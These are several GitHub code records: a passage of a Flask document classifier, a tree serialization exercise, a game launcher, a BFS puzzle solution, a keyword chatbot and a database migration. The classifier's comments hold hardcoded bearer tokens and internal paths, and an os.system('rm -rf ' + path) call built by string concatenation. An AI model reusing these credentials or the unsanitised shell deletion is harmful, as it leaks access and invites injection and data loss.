re.search('[a-zA-Z]', token):\n filtered_tokens.append(token)\n stems = [stemmer.stem(t) for t in filtered_tokens]\n return stems\n\n\ndef file_validation(file_name,file_size):\n is_valid = False\n logger.info(\" file_validation : {}\", file_name)\n print(\" file_name :\",file_name)\n print(\" File Size :\",file_size)\n if os.path.exists(file_name) and os.access(file_name,os.R_OK) and (min_file_size <= file_size ) and (max_file_size >= file_size) :\n is_valid = True\n logger.info(\" file_validation : {}\",file_validation)\n print(\"file_validation ->\",is_valid)\n return is_valid\n\n\ndef get_file_name(file_path):\n filename = ''\n if len(file_path) > 1:\n filename = os.path.splitext(os.path.basename(file_path))[0]\n return str(filename)\n\n\ndef add_unclassified_docs(group_details,disc_inbound_id,org_filename,is_training,auth_key):\n unclassified_dict = {}\n try:\n if group_details['error_code'] == 0 and group_details['group_no'] is not None and int(group_details['group_no']) > 0 :\n prediction_json[\"group_no\"] = group_details['group_no']\n prediction_json[\"unclassified_file_name\"] = group_details['unclassified_file_name']\n unclassified_dict['DiscoveryInBoundId'] = disc_inbound_id\n unclassified_dict['ClassificationGroupId'] = int(group_details['group_no'])\n unclassified_dict['FileLocation'] = group_details['file_name']\n logger.info(\"\\n\\n\\n **************** class :group_details : {} \", group_details['file_name'])\n 
unclassified_dict['Name'] = org_filename\n unclassified_dict['DisplayName'] = org_filename\n unclassified_dict['IsTemplate'] = group_details['new_group']\n unclassified_dict['IsTrainingDocument'] = is_training\n #classifier_transactions.add_unclassified_doc_info(unclassified_dict,auth_key)\n else:\n prediction_json[\"error_msg\"] = group_details['error_msg']\n prediction_json[\"error_code\"] = group_details['error_code']\n #classifier_transactions.update_inbound_status(disc_inbound_id,auth_key)\n except Exception as error:\n print(error)\n #classifier_transactions.update_inbound_status(disc_inbound_id)\n #error_updation.exception_log(error, \" Error occurred when adding unclassified details \", str(disc_inbound_id))\n\n\n@app.route('/'+config['CLASSIFIER']['CLASSIFIER_URL_NAME'], methods=['POST'])\ndef classifier():\n from flask import jsonify,request\n dfx_data = request.get_json(force=True)\n logger.info(\" classifier JSON: {}\",type(dfx_data))\n # filename = data['file_name']\n # disc_inbound_id = data['inbound_id']\n # is_training_source = data['IsTrainingSource']\n # is_unclassified = data['is_unclassified']\n details = classification(dfx_data)\n logger.info(\"\\n classifier :{}\", details)\n return jsonify(details)\n\n\n# def classification(dfx_data):\n# import gc\n# try:\n# prediction_json['error_code'] = 0\n# prediction_json[\"error_msg\"] = ''\n# filename = dfx_data['file_name']\n# prediction_json['disc_inbound_id'] = dfx_data['inbound_id']\n# auth_key = dfx_data['Authorization']\n# is_training_source = 0\n# if dfx_data['FileLength'] is not None and type(dfx_data['FileLength']) is not int:\n# file_size = int(dfx_data['FileLength'])\n# else:\n# file_size = dfx_data['FileLength']\n# disc_inbound_id = dfx_data['inbound_id']\n# if dfx_data['IsTrainingSource'] is not None and type(dfx_data['IsTrainingSource']) is not int:\n# is_training_source = int(dfx_data['IsTrainingSource'])\n# is_unclassified = dfx_data['is_unclassified']\n# data_processing = {}\n# if file_validation(filename,file_size) and int(disc_inbound_id) > 0 :\n# if int(is_unclassified) == 1:\n# data_processing['text_file_name'] = filename\n# data_processing['error_code'] = 0\n# else:\n# data_processing = doc_processing.filter_text_from_file(filename,disc_inbound_id,auth_key)\n# logger.info(\"\\n\\n\\n data_processing: {}\", data_processing)\n# if int(data_processing['error_code']) is not 2 and data_processing['text_file_name'] is not None and data_processing['text_file_name'].strip() is not '' and int(data_processing['error_code']) == 0 and len(data_processing['text_file_name'].strip()) > 1 :\n# txt_filename = data_processing['text_file_name']\n# text_extraction = ''\n# logger.info(\" \\n Classification: txt_filename {}\",txt_filename)\n# with open(txt_filename, 'rb') as text_file:\n# #text_extraction = text_file.read()\n# text_raw = ''+(text_file.read()).decode()\n# # logger.info(text_raw)\n# text_extraction = remove_stop_words(text_raw)\n# # logger.info(text_extraction)\n# if os.path.exists(vec_model_path) and os.path.exists(model_path):\n# global is_model_enabled\n# is_model_enabled = True\n# logger.info(\"\\n\\n is_model_enabled : {}\",is_model_enabled)\n# if len(filename.strip()) > 1 and text_extraction is not None and len(text_extraction.strip()) > 0 and is_model_enabled :\n# logger.info(\" Prediction Section : ******************** \\n\")\n# features_list=vectorizer_model.transform([text_extraction]) # .toarray()\n# prediction=classifier_model.predict(features_list)\n# prediction_id = int(prediction)\n# 
logger.debug(\"\\n\\n prediction : {}\", prediction_id)\n# proba_pred=classifier_model.predict_proba(features_list)\n# new_doc_classifier=proba_pred[:, prediction_id]\n# logger.info(\"\\n\\n new_doc_classifier: {}\", new_doc_classifier, float(classification_model_accuracy), float(new_doc_classifier))\n# if is_training_source == 0 and float(new_doc_classifier) >= float(classification_model_accuracy):\n# class_dict = {}\n# class_id = 0\n# logger.info(\"Prediction : {}\", prediction_id)\n# logger.info(\"Prediction Probability :{}\", proba_pred[:, prediction_id])\n# prediction_json[\"file_name\"] = filename\n# prediction_json[\"predition_type\"] = new_doc_classifier\n# class_name = id_to_category.get(int(prediction_id))\n# org_subclass_id = classifier_transactions.find_subclassification_id(class_name,auth_key)\n# logger.info(\"\\n\\n class_name : {}\", class_name)\n# prediction_json['predicted_category'] = class_name\n# class_dict[\"ClassificationTemplateId\"] = classifier_transactions.find_classification_id(org_subclass_id,auth_key)\n# class_dict[\"SubClassificationTemplateId\"] = org_subclass_id\n# class_dict[\"Type\"] = class_name\n# class_dict[\"DiscoveryInBoundId\"] = int(disc_inbound_id)\n# # predicted_dir_name = os.path.normpath(os.path.join(class_predicted_loc,class_name))\n# # if not os.path.exists(predicted_dir_name):\n# # os.makedirs(predicted_dir_name, mode=0o777, exist_ok=False)\n# # logger.info(\"predicted_file_name:{}\",predicted_dir_name)\n# class_id = classifier_transactions.save_classified_result(class_dict,txt_filename,auth_key)\n# logger.info(\"\\n\\n **************** class_id : {}\", class_id)\n# if is_unclassified is not None and int(is_unclassified) == 1:\n# classifier_transactions.update_unclassified_status(dfx_data['unclass_id'],auth_key)\n# if os.path.exists(txt_filename):\n# os.remove(txt_filename)\n# dir_name = os.path.split(txt_filename)[0]\n# temp_file_name = os.path.split(txt_filename)[1]\n# template_loc = os.path.normpath(os.path.join(sim_template_loc ,os.path.split(dir_name)[1]))\n# print( \"\\n dir_name:\",dir_name,\"\\n temp_file_name: \",temp_file_name,\"\\n template_loc\" , template_loc )\n# if os.path.exists(template_loc) and os.path.isdir(template_loc) and len(\n# os.listdir(dir_name)) == 0:\n# # os.remove(os.path.normpath(os.path.join(template_loc, temp_file_name)))\n# os.system(\"rm -rf \"+template_loc)\n# import shutil\n# shutil.rmtree(dir_name)\n# import shutil\n# if os.path.exists(txt_filename):\n# os.remove(txt_filename)\n# elif is_training_source == 1 and float(new_doc_classifier) >= float(classification_model_accuracy):\n# if os.path.exists(txt_filename):\n# os.remove(txt_filename)\n# prediction_json[\"error_msg\"] = \" The document is marked for training \"\n# prediction_json['error_code'] = 1\n# classifier_transactions.update_inbound_status(disc_inbound_id,auth_key)\n# error_updation.custom_error_update_log(\" Duplicate training document \", \" Duplicate training document \",\n# str(disc_inbound_id))\n# elif int(is_unclassified) is not 1:\n# group_details = find_group(txt_filename,auth_key)\n# add_unclassified_docs(group_details, disc_inbound_id,get_file_name(filename), is_training_source,auth_key)\n# elif len(filename.strip()) > 1 and text_extraction is not None and len(text_extraction.strip()) > 1 and not is_model_enabled:\n# group_details = find_group(txt_filename,auth_key)\n# add_unclassified_docs(group_details, disc_inbound_id, get_file_name(filename), is_training_source,auth_key)\n# else:\n# prediction_json[\"error_msg\"] = 
data_processing['error_msg']\n# prediction_json['error_code'] = int(data_processing['error_code'])\n# classifier_transactions.update_inbound_status(disc_inbound_id,auth_key)\n# logger.info(\" prediction_json: {}\", prediction_json)\n# error_updation.custom_error_update_log(data_processing['error_msg'],\n# data_processing['error_msg'],\n# str(disc_inbound_id))\n# else:\n# prediction_json[\"error_msg\"] = \" Kindly check the document's path/read permission/size \"\n# prediction_json['error_code'] = 1\n# classifier_transactions.update_inbound_status(disc_inbound_id,auth_key)\n# error_updation.custom_error_update_log(\" Kindly check the document's path/permission/size \", \" Kindly check the document's path/permission/size \", str(disc_inbound_id))\n# logger.debug(prediction_json)\n# logger.info(\"\\n\\n prediction_json {}\", prediction_json)\n# except Exception as exception:\n# classifier_transactions.update_inbound_status(disc_inbound_id,auth_key)\n# error_updation.exception_log(exception, prediction_json, str(disc_inbound_id))\n# # prediction_json['error_code'] = 1\n# logger.debug(\"\\n\\n exception: {}\", exception)\n# prediction_json[\"error_msg\"] = \" Document Exception : \"+str(exception)\n# return json.dumps(str(prediction_json))\n# # tagging the text files\n\ndef eliminating_classified():\n return {\n \"size\": 5000,\n \"query\": {\n \"bool\": {\n \"filter\": {\n \"wildcard\": {\n \"content\": \"*\"\n }\n },\n\n \"must_not\": [\n {\"exists\": {\"field\": \"classified\"}},\n {\"exists\": {\"field\": \"group_no\"}}\n ]\n }\n }\n}\n\n\n\n\n\ndef classification(auth_key):\n import gc\n #try:\n data_processing = {}\n #disc_inbound_id = dfx_data['inbound_id']\n filter_classified = es.search(index=index, body=eliminating_classified())\n raw_data = filter_classified['hits']['hits']\n for data in raw_data:\n es_id = data['_id']#urllib.parse.quote(data['_id'], safe='')\n print(es_id)\n inbound_id=data['_source']['resourceName']\n content = data['_source']['content']\n uri= data['_source']['uri']\n data_processing = doc_processing.filter_text_from_file(inbound_id,content,'auth_key')\n logger.info(\"\\n\\n\\n data_processing: {}\", data_processing)\n txt_filename = data_processing['text_file_name']\n text_extraction = ''\n logger.info(\" \\n Classification: txt_filename {}\",txt_filename)\n\n if os.path.exists(vec_model_path) and os.path.exists(model_path):\n global is_model_enabled\n is_model_enabled = True\n logger.info(\"\\n\\n is_model_enabled : {}\",is_model_enabled)\n with open(txt_filename, 'rb+') as text_file:\n # text_extraction = text_file.read()\n text_raw = '' + (text_file.read()).decode()\n # logger.info(text_raw)\n text_extraction = remove_stop_words(text_raw)\n # logger.info(text_extraction)\n if text_extraction is not None and len(text_extraction.strip()) > 0 and is_model_enabled :\n logger.info(\" Prediction Section : ******************** \\n\")\n features_list=vectorizer_model.transform([text_extraction]) # .toarray()\n prediction=classifier_model.predict(features_list)\n prediction_id = int(prediction)\n logger.debug(\"\\n\\n prediction : {}\", prediction_id)\n proba_pred=classifier_model.predict_proba(features_list)\n new_doc_classifier=proba_pred[:, prediction_id]\n logger.info(\"\\n\\n new_doc_classifier: {}\", new_doc_classifier, float(classification_model_accuracy), float(new_doc_classifier))\n if float(new_doc_classifier) >= float(classification_model_accuracy):\n class_dict = {}\n class_id = 0\n logger.info(\"Prediction : {}\", prediction_id)\n logger.info(\"Prediction 
Probability :{}\", proba_pred[:, prediction_id])\n prediction_json[\"file_name\"] = inbound_id\n prediction_json[\"predition_type\"] = new_doc_classifier\n class_name = id_to_category.get(int(prediction_id))\n #org_subclass_id = classifier_transactions.find_subclassification_id(class_name,auth_key)\n logger.info(\"\\n\\n class_name : {}\", class_name)\n prediction_json['predicted_category'] = class_name\n classified_doc_update(class_name,prediction_json[\"predition_type\"][0],content,uri)\n\n # class_dict[\"ClassificationTemplateId\"] = classifier_transactions.find_classification_id(org_subclass_id,auth_key)\n # class_dict[\"SubClassificationTemplateId\"] = org_subclass_id\n # class_dict[\"Type\"] = class_name\n # class_dict[\"DiscoveryInBoundId\"] = int(inbound_id)\n\n #--class_id = classifier_transactions.save_classified_result(class_dict,txt_filename,auth_key)\n #--logger.info(\"\\n\\n **************** class_id : {}\", class_id)\n# if is_unclassified is not None and int(is_unclassified) == 1:\n# classifier_transactions.update_unclassified_status(dfx_data['unclass_id'],auth_key)\n else:\n group_details = find_group(txt_filename, auth_key)\n\n unclassified_doc_update(uri, str(group_details['accuracy_rate']),content,str(group_details['group_no']),str(group_details['group_file_path']),str(group_details['doc_name']))\n elastic_update = update_group_es(es_id, str(group_details['group_no']))\n\n\n\n else:\n group_details = find_group(txt_filename,auth_key)\n print(group_details)\n unclassified_doc_update(uri, str(group_details['accuracy_rate']), content, str(group_details['group_no']),str(group_details['group_file_path']),str(group_details['doc_name']))\n elastic_update = update_group_es(es_id, str(group_details['group_no']))\n\n #print(unclassified_doc_update(uri,))\n #add_unclassified_docs(group_details, inbound_id, get_file_name(txt_filename), \"0\",auth_key)\n\n \n \n # except Exception as exception:\n # #classifier_transactions.update_inbound_status(disc_inbound_id,auth_key)\n # #error_updation.exception_log(exception, prediction_json, str(disc_inbound_id))\n # # prediction_json['error_code'] = 1\n # logger.debug(\"\\n\\n exception: {}\", exception)\n #prediction_json[\"error_msg\"] = \" Document Exception : \"+str(exception)\n return json.dumps(str(prediction_json))\n\n\nif __name__ == '__main__':\n if os.path.exists(vec_model_path) and os.path.exists(model_path):\n logger.info(\"{} \\n\\n\\n\")\n from pyfiglet import Figlet\n f = Figlet(font='slant')\n logger.info(\"{}\", f.renderText('DFX CLASSIFIER ') + \"v 0.1\")\n with open(model_path, 'rb') as model_file:\n classifier_model = pickle.load(model_file)\n with open(vec_model_path, 'rb') as vec_model:\n vectorizer_model = pickle.load(vec_model)\n is_model_enabled = True\n logger.info(\" \\n\\n classification :-> is_model_enabled : {}\", int(is_model_enabled))\n #classifier_api = os.path.normpath(os.path.join(config['CLASSIFIER']['CLASSIFIER_HOST'], config['CLASSIFIER']['CLASSIFIER_URL_NAME']))\n # print(classification(r'\\\\192.168.0.14\\Users\\giri\\Desktop\\Credit_Card_Agreements_2018_Q3\\1st Financial Bank USA\\MasterCard or Visa Credit Card Agreement.pdf',9))\n # payload = {}\n # payload['file_name'] = r'C:\\Users\\baskaran\\Desktop\\Milton.pdf'\n # payload['unclass_id'] = 0\n # payload['inbound_id'] = 354\n # payload['IsTrainingSource'] = 0\n # payload['is_unclassified'] = 0\n # payload['FileLength'] = 24546\n # payload['Authorization'] = 'bearer 
PJZ45ervujGYDWxe0lxRzDPG0fORLHfbaSYHEgDnpUBKF-ueDNlKIWZoNpHUWzNLHVeR5pjcVyRuQpAOn4Ae759UQxT5sH1eshjjR13REREOdr7TfuOXCQhUTFhNUqf8iJChuJjZbXdNYqEnqFX6osHv5YBJbyer5IoiquNOkejk-TQplGJd0gL1_AoT19k_TDpqijaCsZtoHrYRt2ORNaWebl0cdd9pi7jWdYLX6vHnA3c1nxjEQsVjHAxkGIDPGKKYVQPaoXtsDcw6Uk0ypN4siyzdcPj2hWOX7TUWNsI'\n # print(classification(payload))\n # {\"file_name\": \"\\\\\\\\WIN-EN47KDFIU2V\\\\CRMFiles\\\\fsfdfsdfK.docx\", \"unclass_id\": 0, \"inbound_id\": 265,\n # \"IsTrainingSource\": 0, \"is_unclassified\": 0,\n # \"Authorization\": \"bearer 6aAHmqDL4XmXLXAX6lbqhQSTVGR15n8pSaMFIcHn9V0GRhGHHnX4NOf6oSZRHdL9hkjR3U21O6RD8fzRafZIuQpvayXq_hq3qkYrCprUxgbNSj-b9_atmSVzmQlMCqkARfmmxabZqMCP6qKaWM5HyncQvps5SDi9yExt4jGE5qZaRT3DicWlPq1LEdaHKrfAUDX5yNL-PYJyiTmHFiAw-8wUgk0GxvoAGRnhPMTrZo3ZE2nMlDT5SDaJDc40YIMZ9EvgzziV0nj_kWYn5eMezKgcWCbgjfxNpTUEXpZo8lA\",\n # \"FileLength\": null}\n # {\"file_name\": \"\\\\\\\\WIN-EN47KDFIU2V\\\\CRMFiles\\\\9PYMPC_tic.pdf\", \"unclass_id\": 0, \"inbound_id\": 207,\n # \"IsTrainingSource\": 0, \"is_unclassified\": 0,\n # \"Authorization\": \"bearer PJZ45ervujGYDWxe0lxRzDPG0fORLHfbaSYHEgDnpUBKF-ueDNlKIWZoNpHUWzNLHVeR5pjcVyRuQpAOn4Ae759UQxT5sH1eshjjR13REREOdr7TfuOXCQhUTFhNUqf8iJChuJjZbXdNYqEnqFX6osHv5YBJbyer5IoiquNOkejk-TQplGJd0gL1_AoT19k_TDpqijaCsZtoHrYRt2ORNaWebl0cdd9pi7jWdYLX6vHnA3c1nxjEQsVjHAxkGIDPGKKYVQPaoXtsDcw6Uk0ypN4siyzdcPj2hWOX7TUWNsI\"}\n # {\"file_name\": \"\\\\\\\\192.168.0.14\\\\dfx\\\\crm_tmp\\\\2~~d87a4763-8b07-ea11-b806-00155d00090f~~8M1XMA_tic.pdf\",\n # \"unclass_id\": 0, \"inbound_id\": 1, \"IsTrainingSource\": 0, \"is_unclassified\": 0,\n # \"Authorization\": \"bearer 9jYF-wEagkECw_DX75Y80W69TT3m6YQGqQNST4XHhaxb3uiUYTlAYxJnrddmLVB3YXl4p-zPK_KecjmVX3LAZEd0gvbpcILM4ItbYyCwe8dB3Huj8qScXsFpH_ccUAOZydigKLxKR_Px4OICZKGsbxQYQOEhHdDGuDMPxybNDksFNp1L7PrBSWAzs18AmfUDE7RDiHCRDmdkBihJHLPU_AdqAwfJy5Oj2dahFGZVhfcoIb7u-7dr0ok-u5dymJlziEc40M3A9hTYHS4bj9wkAfCuJX7iDx550RW20hh2dZI\"}\n #app.run(host=config['CLASSIFIER']['CLASSIFIER_HOST'], port=config['CLASSIFIER']['API_PORT_NUMBER'], debug=False, threaded = True)\n classification(\"auth_key\")\n\n","repo_name":"giridharanbabu/DFXClassification_V1","sub_path":"classification.py","file_name":"classification.py","file_ext":"py","file_size_in_byte":26535,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"46978979527","text":"class TreeNode:\r\n def __init__(self, x):\r\n self.val = x\r\n self.left = None\r\n self.right = None\r\n\r\ndef Serialize(root):\r\n if not root: return ''\r\n que = [root]\r\n t = [root.val]\r\n while que:\r\n n = len(que)\r\n h_level = []\r\n for _ in range(n):\r\n node = que.pop(0)\r\n if not node.left and not node.right: break\r\n if node.left:\r\n que.append(node.left)\r\n h_level.append(node.left.val)\r\n else: \r\n h_level.append('#')\r\n if node.right:\r\n que.append(node.right)\r\n h_level.append(node.right.val)\r\n else: \r\n h_level.append('#')\r\n t += h_level\r\n t.append('!')\r\n t = map(str, t)\r\n return ','.join(t)\r\n\r\n\r\ndef Deserialize(s):\r\n if not s: return None\r\n s = s.split(',')\r\n root = TreeNode(int(s[0]))\r\n q = [root]\r\n i = 1\r\n while i < len(s)-1:\r\n node = q.pop(0)\r\n if s[i] == '!':\r\n break\r\n if s[i] == '#':\r\n node.left = None\r\n else:\r\n node.left = TreeNode(int(s[i]))\r\n q.append(node.left)\r\n if s[i+1] == '!':\r\n break\r\n if s[i+1] == '#':\r\n node.right = None\r\n else:\r\n node.right = TreeNode(int(s[i+1]))\r\n q.append(node.right)\r\n i += 2\r\n return root\r\n\r\n\r\n\r\n\r\n\r\n\r\n# root = TreeNode(5)\r\n# root.left = TreeNode(4)\r\n# root.left.left = TreeNode(3)\r\n# root.left.left.left = TreeNode(2)\r\n\r\nroot = TreeNode(8)\r\nroot.left = TreeNode(6)\r\nroot.right = TreeNode(10)\r\nroot.left.left = TreeNode(5)\r\nroot.left.right = TreeNode(7)\r\nroot.right.left = TreeNode(9)\r\nroot.right.right = TreeNode(11)\r\n\r\na = Serialize(root)\r\nprint(a)\r\nb = Deserialize(a)\r\nprint(Serialize(b))\r\n\r\ns = []\r\ndef dfs(root):\r\n if not root: return \r\n s.append(root.val)\r\n dfs(root.left)\r\n dfs(root.right)\r\n\r\ndfs(root)\r\nprint(s)\r\n\r\n\r\n\r\n\r\n'''\r\n链接:https://www.nowcoder.com/questionTerminal/cf7e25aa97c04cc1a68c8f040e71fb84?f=discussion\r\n来源:牛客网\r\n\r\ntypedef TreeNode node;\r\ntypedef TreeNode* pnode;\r\ntypedef int* pint;\r\nclass Solution {\r\n vector buf;\r\n void dfs(pnode p){\r\n if(!p) buf.push_back(0x23333);\r\n else{\r\n buf.push_back(p -> val);\r\n dfs(p -> left);\r\n dfs(p -> right);\r\n }\r\n }\r\n pnode dfs2(pint& p){\r\n if(*p == 0x23333){\r\n ++p;\r\n return NULL;\r\n }\r\n pnode res = new node(*p);\r\n ++p;\r\n res -> left = dfs2(p);\r\n res -> right = dfs2(p);\r\n return res;\r\n }\r\npublic:\r\n char* Serialize(TreeNode *p) {\r\n buf.clear();\r\n dfs(p);\r\n int *res = new int[buf.size()];\r\n for(unsigned int i = 0; i < buf.size(); ++i) res[i] = buf[i];\r\n return (char*)res;\r\n }\r\n TreeNode* Deserialize(char *str) {\r\n int *p = (int*)str;\r\n return dfs2(p);\r\n }\r\n};\r\n\r\n'''","repo_name":"asd55667/Jianzhi_offer","sub_path":"61Serialize_Deserialize.py","file_name":"61Serialize_Deserialize.py","file_ext":"py","file_size_in_byte":2995,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"23368408427","text":"import argparse\nfrom voronoi_game import VoronoiGame\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--spawn\", type=int, default=5, help=\"Number of days after which a new unit spawns at the \"\n \"homebase\")\n parser.add_argument(\"--last\", type=int, default=100, help=\"Total number of days the game goes on for\")\n parser.add_argument(\"--seed\", \"-s\", type=int, default=2, help=\"Seed used by random number generator, specify 0 to \"\n \"use no seed and have different random behavior on \"\n \"each launch\")\n parser.add_argument(\"--port\", type=int, default=8080, help=\"Port to start, specify -1 to auto-assign\")\n parser.add_argument(\"--address\", \"-a\", type=str, default=\"127.0.0.1\", help=\"Address\")\n parser.add_argument(\"--no_browser\", \"-nb\", action=\"store_true\", help=\"Disable browser launching in GUI mode\")\n parser.add_argument(\"--no_gui\", \"-ng\", action=\"store_true\", help=\"Disable GUI\")\n parser.add_argument(\"--log_path\", default=\"log\", help=\"Directory path to dump log files, filepath if \"\n \"disable_logging is false\")\n parser.add_argument(\"--disable_logging\", action=\"store_true\", help=\"Disable Logging, log_path becomes path to file\")\n parser.add_argument(\"--disable_timeout\", action=\"store_true\", help=\"Disable timeouts for player code\")\n parser.add_argument(\"--player1\", \"-p1\", default=\"d\", help=\"Specifying player 1 out of 4\")\n parser.add_argument(\"--player2\", \"-p2\", default=\"d\", help=\"Specifying player 2 out of 4\")\n parser.add_argument(\"--player3\", \"-p3\", default=\"d\", help=\"Specifying player 3 out of 4\")\n parser.add_argument(\"--player4\", \"-p4\", default=\"d\", help=\"Specifying player 4 out of 4\")\n parser.add_argument(\"--dump_state\", action=\"store_true\", help=\"Dump game.pkl for rendering\")\n args = parser.parse_args()\n player_list = tuple([args.player1, args.player2, args.player3, args.player4])\n del args.player1\n del args.player2\n del args.player3\n del args.player4\n\n if args.disable_logging:\n if args.log_path == \"log\":\n args.log_path = \"results.log\"\n \n voronoi_game = VoronoiGame(player_list, args)\n","repo_name":"rvg-18227/Voronoi","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2384,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"}
+{"seq_id":"10081169512","text":"import sys\nsys.stdin = open(\"input.txt\")\nfrom collections import deque\n\ndef knight():\n global cnt\n dx = [1, 1, -1, -1, 2, 2, -2, -2]\n dy = [2, -2, 2, -2, 1, -1, 1, -1]\n # 시작점\n q = deque([[sx,sy]])\n while q:\n x,y = q.popleft()\n # 이동하려는 칸 도착시 현재칸 까지 이동횟수 리턴\n if x == lx and y == ly:\n cnt = graph[x][y]\n\n return graph[x][y]\n # 나이트 이동 방향 탐색\n for k in range(8):\n nx = x + dx[k]\n ny = y + dy[k]\n # 범위 내 있고 탐색 X 탐색\n if 0 <= nx < I and 0 <= ny < I:\n if not graph[nx][ny]:\n q.append([nx, ny])\n graph[nx][ny] = graph[x][y] + 1 # 이동횟수 초기화\n\n\nT = int(input())\nfor tc in range(1, T+1):\n I = int(input())\n graph = [[0 for _ in range(I)] for _ in range(I)]\n sx, sy = map(int, input().split())\n lx, ly = map(int, input().split())\n cnt = 0\n knight()\n print(cnt)\n # print(graph)","repo_name":"MalangCowFarm/Algo_JinHwan","sub_path":"week 9/나이트의 이동_7562(BOJ)/sol.py","file_name":"sol.py","file_ext":"py","file_size_in_byte":1051,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"70283989982","text":"import numpy\nimport random\nimport string\nimport nltk\nimport nltk.corpus\nimport nltk.tokenize.punkt\nimport string\nfrom nltk.stem.lancaster import LancasterStemmer\nimport json\nimport pickle\nimport requests\nimport re\nfrom collections import Counter\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.metrics.pairwise import cosine_similarity\nfrom framework.constants import log as log\n\nnltk.download('punkt')\nnltk.download('stopwords')\n\n# Create tokenizer\nstemmer = LancasterStemmer()\nstopwords = nltk.corpus.stopwords.words('english')\nstopwords.extend(string.punctuation)\nstopwords.append('')\ntokenizer = nltk.tokenize.WordPunctTokenizer()\n\ndef train(inp):\n with open(\"intents.json\") as file:\n data = json.load(file)\n try:\n with open(\"data.pickle\", \"rb\") as f:\n words, labels, training, output = pickle.load(f)\n except:\n words = []\n labels = []\n docs_x = []\n docs_y = []\n\n for intent in data[\"intents\"]:\n for pattern in intent[\"patterns\"]:\n wrds = nltk.word_tokenize(pattern)\n words.extend(wrds)\n docs_x.append(wrds)\n docs_y.append(intent[\"tag\"])\n\n if intent[\"tag\"] not in labels:\n labels.append(intent[\"tag\"])\n\n words = [stemmer.stem(w.lower()) for w in words if w != \"?\"]\n words = sorted(list(set(words)))\n\n labels = sorted(labels)\n\n training = []\n output = []\n\n out_empty = [0 for _ in range(len(labels))]\n\n for x, doc in enumerate(docs_x):\n bag = []\n\n wrds = [stemmer.stem(w.lower()) for w in doc]\n\n for w in words:\n if w in wrds:\n bag.append(1)\n else:\n bag.append(0)\n\n output_row = out_empty[:]\n output_row[labels.index(docs_y[x])] = 1\n\n training.append(bag)\n output.append(output_row)\n\n\n training = numpy.array(training)\n output = numpy.array(output)\n with open(\"data.pickle\", \"wb\") as f:\n pickle.dump((words, labels, training, output), f)\n\ndef eventhandle(inp):\n message = inp\n with open(\"nlp/intents.json\",'rb') as f:\n data = json.load(f)\n maxi = 0\n response_item = None\n for items in data[\"intents\"]:\n # regex = ''\n for b in items[\"patterns\"]:\n match = get_jaccard_sim(b,message)\n log.debug(str(match))\n # log.info(\"maxi : \", maxi)\n if(match > maxi):\n maxi = match\n response_item = items\n # log.info(\"maxi changes : \", maxi)\n if response_item is None:\n return \"Sorry I do not understand\"\n else: \n responses = response_item['responses']\n return random.choice(responses)\n\n\ndef get_cosine_sim(*strs): \n vectors = [t for t in get_vectors(*strs)]\n return cosine_similarity(vectors)\n\n\ndef get_vectors(*strs):\n text = [t for t in strs]\n log.debug(text)\n vectorizer = CountVectorizer(text)\n log.debug(vectorizer)\n vectorizer.fit(text)\n return vectorizer.transform(text).toarray()\n\n\ndef get_jaccard_sim(str1, str2): \n a = set(str1.lower().split()) \n # log.debug(\"intent: \", a)\n b = set(str2.lower().split())\n # log.debug(\"input :\", b)\n c = a.intersection(b)\n return float(len(c)) / (len(a) + len(b) - len(c))\n\ndef is_ci_token_stopword_match(a, b):\n \"\"\"Check if a and b are matches.\"\"\"\n tokens_a = [token.lower().strip(string.punctuation) for token in tokenizer.tokenize(a) \\\n if token.lower().strip(string.punctuation) not in stopwords]\n log.debug(\"sentence1: \", tokens_a)\n tokens_b = [token.lower().strip(string.punctuation) for token in tokenizer.tokenize(b) \\\n if token.lower().strip(string.punctuation) not in stopwords]\n log.debug(\"sentence2: \", tokens_b)\n return (tokens_a == tokens_b)\n\ndef 
bag_of_words(s,words):\n    bag = [0 for _ in range(len(words))]\n    s_words = nltk.word_tokenize(s)\n    log.debug(\"before: \",s_words)\n    s_words1 = [stemmer.stem(word.lower()) for word in s_words if word!=\"?\"]\n    log.debug(\"final: \", s_words1)\n    # mark every vocabulary word that appears in the stemmed sentence\n    for sw in s_words1:\n        for i, w in enumerate(words):\n            if w == sw:\n                bag[i] = 1\n    return numpy.array(bag)\n","repo_name":"akankshanb/Bot-Engine","sub_path":"plotbot/nlp/analyze.py","file_name":"analyze.py","file_ext":"py","file_size_in_byte":4206,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"9890989195","text":"# coding: utf-8\n\"\"\"\nAdd NOT NULL constraint for data unless fed_id and component_id are not null.\n\"\"\"\n\nimport os\n\nimport flask_sqlalchemy\n\nfrom .actions_add_objects_readable_by_all_users_by_default import MIGRATION_INDEX as PREVIOUS_MIGRATION_INDEX\n\nMIGRATION_INDEX = PREVIOUS_MIGRATION_INDEX + 1\nMIGRATION_NAME, _ = os.path.splitext(os.path.basename(__file__))\n\n\ndef run(db: flask_sqlalchemy.SQLAlchemy) -> bool:\n constraints = db.session.execute(db.text(\"\"\"\n SELECT conname\n FROM pg_catalog.pg_constraint\n WHERE conname = 'files_not_null_check_data'\n \"\"\")).fetchall()\n\n if len(constraints) > 0:\n return False\n\n db.session.execute(db.text(\"\"\"\n UPDATE files SET data = '{\"storage\": \"local\", \"original_file_name\": \"\"}'::json WHERE data IS NULL AND (fed_id IS NULL OR component_id IS NULL)\n \"\"\"))\n\n # Perform migration\n db.session.execute(db.text(\"\"\"\n ALTER TABLE files\n ADD CONSTRAINT files_not_null_check_data\n CHECK (\n (\n fed_id IS NOT NULL AND\n component_id IS NOT NULL\n ) OR data IS NOT NULL\n )\n \"\"\"))\n return True\n","repo_name":"sciapp/sampledb","sub_path":"sampledb/models/migrations/files_add_data_not_null_constraint.py","file_name":"files_add_data_not_null_constraint.py","file_ext":"py","file_size_in_byte":1199,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"7"}
